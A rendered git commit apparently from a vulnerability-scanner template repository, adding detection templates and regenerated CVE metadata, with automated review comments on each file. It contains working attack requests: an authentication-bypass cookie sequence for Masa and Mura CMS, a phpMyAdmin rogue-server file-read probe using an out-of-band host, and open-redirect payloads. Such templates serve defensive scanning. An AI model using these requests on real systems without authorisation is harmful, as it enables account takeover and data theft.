Merge branch 'main' into dashboard

patch-1
MostInterestingBotInTheWorld 2023-03-17 11:24:28 -04:00 committed by GitHub
commit 7677e07dec
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
756 changed files with 3284 additions and 1564 deletions


@ -6,6 +6,7 @@ on:
- main
paths:
- 'cves/**'
workflow_dispatch: # allows manual triggering of the workflow
jobs:
cve2json:
@ -18,16 +19,17 @@ jobs:
go-version: 1.19
check-latest: true
- name: run yaml2json.go to generate cves.json
- name: Run yaml2json.go to generate cves.json
run: |
go env -w GO111MODULE=off
go get gopkg.in/yaml.v3
go run .github/scripts/yaml2json.go $GITHUB_WORKSPACE/cves/ cves.json
md5sum cves.json | cut -d' ' -f1 > cves.json-checksum.txt
- name: Commit files
run: |
git pull
git add cves.json
git add cves.json cves.json-checksum.txt
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git commit -m "Auto Generated cves.json [$(date)] :robot:" -a
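Review bot: The new checksum step writes an MD5 digest (`md5sum cves.json | cut -d' ' -f1 > cves.json-checksum.txt`); MD5 is adequate for spotting accidental corruption of the generated file but not for verifying that it has not been altered, so if anything downstream treats this file as an integrity check, `sha256sum cves.json | cut -d' ' -f1 > cves.json-checksum.txt` is the safer choice (and consumers that parse the digest length would need updating). Separately, the commit step's `-a` flag stages every tracked modification, so the explicit `git add cves.json cves.json-checksum.txt` line is redundant and anything else modified after `git pull` is committed too; dropping `-a` makes the commit contain only the two generated files. The `go-version: 1.19` value is unquoted, which parses correctly today but would turn `1.20` into the float `1.2`; `go-version: "1.19"` avoids that trap.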


@ -1,3 +1,14 @@
cves/2015/CVE-2015-2863.yaml
cves/2017/CVE-2017-14524.yaml
cves/2019/CVE-2019-6799.yaml
cves/2022/CVE-2022-47002.yaml
cves/2022/CVE-2022-47003.yaml
cves/2023/CVE-2023-26255.yaml
cves/2023/CVE-2023-26256.yaml
default-logins/magnolia-default-login.yaml
exposed-panels/magnolia-panel.yaml
exposed-panels/veriz0wn-osint.yaml
exposures/files/reactapp-env-js.yaml
exposures/tokens/adobe/adobe-oauth-secret.yaml
exposures/tokens/age/age-public-key.yaml
exposures/tokens/age/age-secret-key.yaml
@ -38,3 +49,17 @@ exposures/tokens/square/square-oauth-secret-token.yaml
exposures/tokens/stackhawk/stackhawk-api.yaml
exposures/tokens/telegram/telegram-bot-token.yaml
exposures/tokens/twilio/twilio-api-key.yaml
file/audit/pfsense/set-hostname.yaml
file/js/js-analyse.yaml
misconfiguration/apache/apache-nifi-unauth.yaml
misconfiguration/everything-listing.yaml
misconfiguration/installer/magnolia-installer.yaml
osint/couchsurfing.yaml
ssl/revoked-ssl-certificate.yaml
technologies/nacos-version.yaml
vulnerabilities/other/brightsign-dsdws-ssrf.yaml
vulnerabilities/php/php-xdebug-rce.yaml
vulnerabilities/phpmyadmin-unauth.yaml
vulnerabilities/ueditor/ueditor-ssrf.yaml
vulnerabilities/ueditor/ueditor-xss.yaml
"\342\200\216\342\200\216misconfiguration/laravel-debug-infoleak.yaml"
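Review bot: The last entry, `"\342\200\216\342\200\216misconfiguration/laravel-debug-infoleak.yaml"`, is git's quoted rendering of a path that starts with two U+200E LEFT-TO-RIGHT MARK characters, which suggests the list was generated from git output and that the template file itself was committed under a name containing invisible characters. As written the entry is a different string from `misconfiguration/laravel-debug-infoleak.yaml` (it carries literal quotes and backslash escapes), so it will not match that template when this list is consumed, and the invisible marks in the real filename are the kind of thing a repository-wide check for non-ASCII paths would catch. Whether this line is newly added or context is not recoverable from the rendering, but either way it should become the plain ASCII path, with the template renamed to match.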


@ -33,7 +33,6 @@ files:
- cves/2020/CVE-2020-2036.yaml
- cves/2020/CVE-2020-28351.yaml
- cves/2021/CVE-2021-35265.yaml
- vulnerabilities/generic/basic-xss-prober.yaml
- vulnerabilities/oracle/oracle-ebs-xss.yaml
- vulnerabilities/other/nginx-module-vts-xss.yaml
- exposures/files/svn-wc-db.yaml
- cves/2006/CVE-2006-1681.yaml # https://github.com/projectdiscovery/nuclei-templates/pull/6914


@ -4,12 +4,12 @@ info:
name: EEA - Information Disclosure
author: pikpikcu
severity: high
description: EEA is susceptible to information disclosure.
description: EEA is susceptible to information disclosure including the username and password.
reference:
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-200
tags: config,exposure,cnvd,cnvd2021


@ -255,6 +255,7 @@
{"ID":"CVE-2015-2166","Info":{"Name":"Ericsson Drutt MSDP - Local File Inclusion","Severity":"high","Description":"Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-2166.yaml"}
{"ID":"CVE-2015-2755","Info":{"Name":"AB Google Map Travel (AB-MAP) Wordpress Plugin \u003c=3.4 - Stored XSS","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in the AB Google Map Travel (AB-MAP) plugin before 4.0 for WordPress allow remote attackers to hijack the authentication of administrators for requests that conduct cross-site scripting (XSS) attacks via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameter in the ab_map_options page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-2755.yaml"}
{"ID":"CVE-2015-2807","Info":{"Name":"Navis DocumentCloud \u003c0.1.1 - Cross-Site Scripting","Severity":"medium","Description":"Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-2807.yaml"}
{"ID":"CVE-2015-2863","Info":{"Name":"Kaseya Virtual System Administrator - Open Redirect","Severity":"low","Description":"Open redirect vulnerability in Kaseya Virtual System Administrator (VSA) 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2015/CVE-2015-2863.yaml"}
{"ID":"CVE-2015-2996","Info":{"Name":"SysAid Help Desk \u003c15.2 - Local File Disclosure","Severity":"high","Description":"Multiple directory traversal vulnerabilities in SysAid Help Desk before 15.2 allow remote attackers to (1) read arbitrary files via a .. (dot dot) in the fileName parameter to getGfiUpgradeFile or (2) cause a denial of service (CPU and memory consumption) via a .. (dot dot) in the fileName parameter to calculateRdsFileChecksum.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2015/CVE-2015-2996.yaml"}
{"ID":"CVE-2015-3035","Info":{"Name":"TP-LINK - Local File Inclusion","Severity":"high","Description":"TP-LINK is susceptible to local file inclusion in these products: Archer C5 (1.2) with firmware before 150317, Archer C7 (2.0) with firmware before 150304, and C8 (1.0) with firmware before 150316, Archer C9 (1.0), TL-WDR3500 (1.0), TL-WDR3600 (1.0), and TL-WDR4300 (1.0) with firmware before 150302, TL-WR740N (5.0) and TL-WR741ND (5.0) with firmware before 150312, and TL-WR841N (9.0), TL-WR841N (10.0), TL-WR841ND (9.0), and TL-WR841ND (10.0) with firmware before 150310. Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"cves/2015/CVE-2015-3035.yaml"}
{"ID":"CVE-2015-3224","Info":{"Name":"Ruby on Rails Web Console - Remote Code Execution","Severity":"critical","Description":"Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-3224.yaml"}
@ -371,6 +372,7 @@
{"ID":"CVE-2017-12794","Info":{"Name":"Django Debug Page - Cross-Site Scripting","Severity":"medium","Description":"Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with \"DEBUG = True\" is not on by default (which is what makes the page visible).\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-12794.yaml"}
{"ID":"CVE-2017-14135","Info":{"Name":"OpenDreambox 2.0.0 - Remote Code Execution","Severity":"critical","Description":"OpenDreambox 2.0.0 is susceptible to remote code execution via the webadmin plugin. Remote attackers can execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI in enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2017/CVE-2017-14135.yaml"}
{"ID":"CVE-2017-14186","Info":{"Name":"FortiGate FortiOS SSL VPN Web Portal - Cross-Site Scripting","Severity":"medium","Description":"FortiGate FortiOS through SSL VPN Web Portal contains a cross-site scripting vulnerability. The login redir parameter is not sanitized, so an attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks such as a URL redirect. Affected versions are 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, and 5.4 and below.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2017/CVE-2017-14186.yaml"}
{"ID":"CVE-2017-14524","Info":{"Name":"OpenText Documentum Administrator 7.2.0180.0055 - Open redirect","Severity":"medium","Description":"Multiple open redirect vulnerabilities in OpenText Documentum Administrator 7.2.0180.0055 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-14524.yaml"}
{"ID":"CVE-2017-14535","Info":{"Name":"Trixbox - 2.8.0.4 OS Command Injection","Severity":"high","Description":"Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2017/CVE-2017-14535.yaml"}
{"ID":"CVE-2017-14537","Info":{"Name":"Trixbox 2.8.0 - Path Traversal","Severity":"medium","Description":"Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2017/CVE-2017-14537.yaml"}
{"ID":"CVE-2017-14622","Info":{"Name":"2kb Amazon Affiliates Store plugin \u003c 2.1.1 - Reflected Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting (XSS) vulnerabilities in the 2kb Amazon Affiliates Store plugin before 2.1.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) page parameter or (2) kbAction parameter in the kbAmz page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-14622.yaml"}
@ -679,6 +681,7 @@
{"ID":"CVE-2019-6112","Info":{"Name":"WordPress Sell Media 2.4.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Plugin Sell Media v2.4.1 contains a cross-site scripting vulnerability in /inc/class-search.php that allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field).","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-6112.yaml"}
{"ID":"CVE-2019-6340","Info":{"Name":"Drupal - Remote Code Execution","Severity":"high","Description":"Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10 V contain certain field types that do not properly sanitize data from non-form sources, which can lead to arbitrary PHP code execution in some cases.","Classification":{"CVSSScore":"8.1"}},"file_path":"cves/2019/CVE-2019-6340.yaml"}
{"ID":"CVE-2019-6715","Info":{"Name":"W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal","Severity":"high","Description":"WordPress plugin W3 Total Cache before version 0.9.4 allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data via pub/sns.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-6715.yaml"}
{"ID":"CVE-2019-6799","Info":{"Name":"CVE-2019-6799","Severity":"high","Description":"An issue was discovered in phpMyAdmin before 4.8.5. When the AllowArbitraryServer configuration setting is set to true, with the use of a rogue MySQL server, an attacker can read any file on the server that the web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of \"options(MYSQLI_OPT_LOCAL_INFILE\" calls.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2019/CVE-2019-6799.yaml"}
{"ID":"CVE-2019-6802","Info":{"Name":"Pypiserver 1.2.5 - CRLF Injection","Severity":"medium","Description":"CRLF Injection in pypiserver 1.2.5 and below allows attackers to set arbitrary HTTP headers and possibly conduct XSS attacks via a %0d%0a in a URI\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-6802.yaml"}
{"ID":"CVE-2019-7219","Info":{"Name":"Zarafa WebApp \u003c=2.0.1.47791 - Cross-Site Scripting","Severity":"medium","Description":"Zarafa WebApp 2.0.1.47791 and earlier contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-7219.yaml"}
{"ID":"CVE-2019-7238","Info":{"Name":"Sonatype Nexus Repository Manager \u003c3.15.0 - Remote Code Execution","Severity":"critical","Description":"Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-7238.yaml"}
@ -1614,6 +1617,8 @@
{"ID":"CVE-2022-46169","Info":{"Name":"Cacti \u003c= 1.2.22 Unauthenticated Command Injection","Severity":"critical","Description":"The vulnerability allows a remote attacker to compromise the affected system. The vulnerability exists due to insufficient authorization within the Remote Agent when handling HTTP requests with a custom Forwarded-For HTTP header. A remote non-authenticated attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-46169.yaml"}
{"ID":"CVE-2022-46381","Info":{"Name":"Linear eMerge E3-Series - Cross-Site Scripting","Severity":"medium","Description":"Linear eMerge E3-Series devices contain a cross-site scripting vulnerability via the type parameter, e.g., to the badging/badge_template_v0.php component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and thus steal cookie-based authentication credentials and launch other attacks. This affects versions 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-46381.yaml"}
{"ID":"CVE-2022-46888","Info":{"Name":"NexusPHP - Cross-Site Scripting","Severity":"medium","Description":"NexusPHPbefore 1.7.33 allow remote attackers to inject arbitrary web script or HTML via the secret parameter in /login.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-46888.yaml"}
{"ID":"CVE-2022-47002","Info":{"Name":"Masa CMS - Authentication Bypass","Severity":"critical","Description":"A vulnerability in the Remember Me function of Masa CMS v7.2, 7.3, and 7.4-beta allows attackers to bypass authentication via a crafted web request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-47002.yaml"}
{"ID":"CVE-2022-47003","Info":{"Name":"Mura CMS - Authentication Bypass","Severity":"critical","Description":"A vulnerability in the Remember Me function of Mura CMS before v10.0.580 allows attackers to bypass authentication via a crafted web request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-47003.yaml"}
{"ID":"CVE-2022-47945","Info":{"Name":"Thinkphp Lang - Local File Inclusion","Severity":"critical","Description":"ThinkPHP Framework before 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-47945.yaml"}
{"ID":"CVE-2022-47966","Info":{"Name":"ManageEngine - Remote Command Execution","Severity":"critical","Description":"Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-47966.yaml"}
{"ID":"CVE-2022-47986","Info":{"Name":"Pre-Auth RCE in Aspera Faspex","Severity":"critical","Description":"IBM Aspera Faspex could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-47986.yaml"}
@ -1626,3 +1631,5 @@
{"ID":"CVE-2023-23752","Info":{"Name":"Joomla Improper AccessCheck in WebService Endpoint","Severity":"medium","Description":"An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2023/CVE-2023-23752.yaml"}
{"ID":"CVE-2023-24044","Info":{"Name":"Plesk Obsidian - Host Header Injection","Severity":"medium","Description":"A Host Header Injection issue on the Login page of Plesk Obsidian through 18.0.49 allows attackers to redirect users to malicious websites via a Host request header.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2023/CVE-2023-24044.yaml"}
{"ID":"CVE-2023-24322","Info":{"Name":"mojoPortal - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in the FileDialog.aspx component of mojoPortal v2.7.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the ed and tbi parameters.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2023/CVE-2023-24322.yaml"}
{"ID":"CVE-2023-26255","Info":{"Name":"STAGIL Navigation for Jira - Menu \u0026 Themes - Local File Inclusion","Severity":"high","Description":"An unauthenticated path traversal vulnerability affects the \"STAGIL Navigation for Jira - Menu \u0026 Themes\" plugin before 2.0.52 for Jira. By modifying the fileName parameter to the snjCustomDesignConfig endpoint, it is possible to traverse and read the file system.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2023/CVE-2023-26255.yaml"}
{"ID":"CVE-2023-26256","Info":{"Name":"STAGIL Navigation for Jira - Menu \u0026 Themes - Local File Inclusion","Severity":"high","Description":"An unauthenticated path traversal vulnerability affects the \"STAGIL Navigation for Jira - Menu \u0026 Themes\" plugin before 2.0.52 for Jira. By modifying the fileName parameter to the snjFooterNavigationConfig endpoint, it is possible to traverse and read the file system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2023/CVE-2023-26256.yaml"}

cves.json-checksum.txt Normal file

@ -0,0 +1 @@
20c79240d730d56503179dda7a411392


@ -0,0 +1,31 @@
id: CVE-2015-2863
info:
name: Kaseya Virtual System Administrator - Open Redirect
author: 0x_Akoko
severity: low
description: |
Open redirect vulnerability in Kaseya Virtual System Administrator (VSA) 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
reference:
- https://github.com/pedrib/PoC/blob/3f927b957b86a91ce65b017c4b9c93d05e241592/advisories/Kaseya/kaseya-vsa-vuln.txt
- https://www.cvedetails.com/cve/CVE-2015-2863
- http://www.kb.cert.org/vuls/id/919604
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2015-2863
cwe-id: CWE-601
tags: cve,cve2015,redirect,kaseya
requests:
- method: GET
path:
- '{{BaseURL}}/inc/supportLoad.asp?urlToLoad=http://oast.me'
- '{{BaseURL}}/vsaPres/Web20/core/LocalProxy.ashx?url=http://oast.me'
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1


@ -0,0 +1,31 @@
id: CVE-2017-14524
info:
name: OpenText Documentum Administrator 7.2.0180.0055 - Open redirect
author: 0x_Akoko
severity: medium
description: |
Multiple open redirect vulnerabilities in OpenText Documentum Administrator 7.2.0180.0055 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks.
reference:
- https://seclists.org/fulldisclosure/2017/Sep/57
- https://nvd.nist.gov/vuln/detail/CVE-2017-14524
- https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774
- http://seclists.org/fulldisclosure/2017/Sep/57
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-14524
cwe-id: CWE-601
tags: cve,cve2017,redirect,opentext,seclists
requests:
- method: GET
path:
- '{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$'
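Review bot: The reference list cites the same advisory twice, as `https://seclists.org/fulldisclosure/2017/Sep/57` and again as `http://seclists.org/fulldisclosure/2017/Sep/57`; the plain-http duplicate should be dropped. The Location-header regex here (`(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$`) differs from the one in the CVE-2015-2863 template added in the same commit, which tolerates a trailing path after `oast.me`; this variant requires the header to end right after the host, so a server that normalises the redirect to `//oast.me/` would be missed, and sharing one pattern across both templates would avoid that drift. The classification still uses `CVSS:3.0` while this commit moves other templates to `CVSS:3.1`; `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N` keeps the same 6.1 score.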


@ -0,0 +1,90 @@
id: CVE-2019-6799
info:
name: CVE-2019-6799
author: pwnhxl
severity: high
description: |
An issue was discovered in phpMyAdmin before 4.8.5. When the AllowArbitraryServer configuration setting is set to true, with the use of a rogue MySQL server, an attacker can read any file on the server that the web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of "options(MYSQLI_OPT_LOCAL_INFILE" calls.
reference:
- https://paper.seebug.org/1112/#_4
- https://github.com/phpmyadmin/phpmyadmin/commit/828f740158e7bf14aa4a7473c5968d06364e03a2
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6799
- https://nvd.nist.gov/vuln/detail/CVE-2019-6799
- https://github.com/rmb122/rogue_mysql_server
- https://github.com/vulnspy/phpmyadmin-4.8.4-allowarbitraryserver
metadata:
verified: "true"
shodan-query: title:"phpmyadmin"
hunter-query: app.name="phpMyAdmin"&&web.body="pma_servername"&&web.body="4.8.4"
fofa-query: body="pma_servername" && body="4.8.4"
tags: cve,cve2019,phpmyadmin,mysql,fileread
requests:
- raw:
- |
GET {{path}}?pma_servername={{interactsh-url}}&pma_username={{randstr}}&pma_password={{randstr}}&server=1 HTTP/1.1
Host: {{Hostname}}
payloads:
path:
- "/index.php"
- "/pma/index.php"
- "/pmd/index.php"
- "/phpMyAdmin/index.php"
- "/phpmyadmin/index.php"
- "/_phpmyadmin/index.php"
attack: batteringram
extractors:
- type: regex
name: version
internal: true
group: 1
regex:
- '\?v=([0-9.]+)'
- type: regex
group: 1
regex:
- '\?v=([0-9.]+)'
- type: regex
name: phpversion
part: header
internal: true
group: 1
regex:
- "X-Powered-By: PHP/([0-9.]+)"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
words:
- "mysqli_real_connect"
- type: word
words:
- "pma_servername"
- type: dsl
dsl:
- compare_versions(version, '< 4.8.5')
- type: dsl
dsl:
- compare_versions(version, '> 3.9.9')
- type: dsl
dsl:
- compare_versions(phpversion, '< 7.3.4')
- type: status
status:
- 200
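Review bot: `name: CVE-2019-6799` merely repeats the template id, and the template has no `classification` block, so the regenerated cves.json in this commit carries `"Name":"CVE-2019-6799"` and `"CVSSScore":"N/A"` for it where the other new CVE templates supply a product name plus `cvss-metrics`, `cve-id` and `cwe-id`. A descriptive name such as `name: phpMyAdmin <4.8.5 - Arbitrary File Read via AllowArbitraryServer` and a classification block containing `cve-id: CVE-2019-6799` would bring it in line; the vector and score should be copied from the NVD record rather than estimated, so I have not proposed values. The second version extractor repeats the first regex without `internal: true`, presumably so the version appears in output; if that is the intent, a one-line comment saying so would stop a later reader from removing it as a duplicate.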


@ -12,10 +12,10 @@ info:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31474
remediation: Upgrade to at least version 8.7.5 or higher
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
cve-id: CVE-2022-31474
cwe-id: CWE-22
tags: cve,cve2022,wordpress,wp-plugin,wp,lfi,backupbuddy
requests:


@ -5,7 +5,7 @@ info:
author: theamanrawat
severity: high
description: |
Server Side Request Forgery (SSRF) vulnerability in WordPress Paytm Payment Gateway Plugin. This could allow a malicious actor to cause a website to execute website requests to an arbitrary domain of the attacker. This could allow a malicious actor to find sensitive information.
Server Side Request Forgery (SSRF) vulnerability in WordPress Paytm Payment Gateway Plugin. This could allow a malicious actor to cause a website to execute website requests to an arbitrary domain of the attacker. This could allow a malicious actor to find sensitive information.
reference:
- https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-0-server-side-request-forgery-ssrf-vulnerability
- https://wordpress.org/plugins/paytm-payments/
@ -24,6 +24,7 @@ requests:
GET /?paytm_action=curltest&url={{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol


@ -0,0 +1,69 @@
id: CVE-2022-47002
info:
name: Masa CMS - Authentication Bypass
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
A vulnerability in the Remember Me function of Masa CMS v7.2, 7.3, and 7.4-beta allows attackers to bypass authentication via a crafted web request.
reference:
- https://hoyahaxa.blogspot.com/2023/03/authentication-bypass-mura-masa.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-47002
- https://github.com/MasaCMS/MasaCMS/releases/tag/7.3.10
- https://hoyahaxa.blogspot.com/2023/01/preliminary-security-advisory.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-47002
cwe-id: CWE-863
metadata:
shodan-query: 'Generator: Masa CMS'
verified: "true"
tags: cve,cve2022,auth-bypass,cms,masa
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1
Host: {{Hostname}}
- |
GET /admin/?muraAction=cEditProfile.edit HTTP/1.1
Host: {{Hostname}}
Cookie: userid={{uuid}}; userhash=
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: dsl
condition: and
dsl:
- 'contains(body_3,"\"userid\"")'
- type: word
part: body_3
words:
- "Edit Profile"
extractors:
- type: regex
part: body
name: siteid
group: 1
internal: true
regex:
- 'siteid:"(.*?)"'
- type: regex
part: body
name: uuid
group: 1
internal: true
regex:
- '"lastupdatebyid":"([A-F0-9-]+)"'
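Review bot: The first matcher sets `condition: and` on a `dsl` list holding a single expression, so the condition has no effect and can be dropped; the same redundant line appears in the CVE-2022-47003 template added alongside this one. The two templates are otherwise byte-identical from `requests:` down to the last extractor, so any later correction to, say, the `siteid:"(.*?)"` or `"lastupdatebyid":"([A-F0-9-]+)"` regexes will have to be made twice; a comment in each pointing at the other would help keep them in step.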


@ -0,0 +1,69 @@
id: CVE-2022-47003
info:
name: Mura CMS - Authentication Bypass
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
A vulnerability in the Remember Me function of Mura CMS before v10.0.580 allows attackers to bypass authentication via a crafted web request.
reference:
- https://hoyahaxa.blogspot.com/2023/03/authentication-bypass-mura-masa.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-47003
- http://mura.com
- https://www.murasoftware.com/mura-cms/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-47003
cwe-id: CWE-863
metadata:
shodan-query: 'Generator: Musa CMS'
verified: "true"
tags: cve,cve2022,auth-bypass,cms,mura
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1
Host: {{Hostname}}
- |
GET /admin/?muraAction=cEditProfile.edit HTTP/1.1
Host: {{Hostname}}
Cookie: userid={{uuid}}; userhash=
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: dsl
condition: and
dsl:
- 'contains(body_3,"\"userid\"")'
- type: word
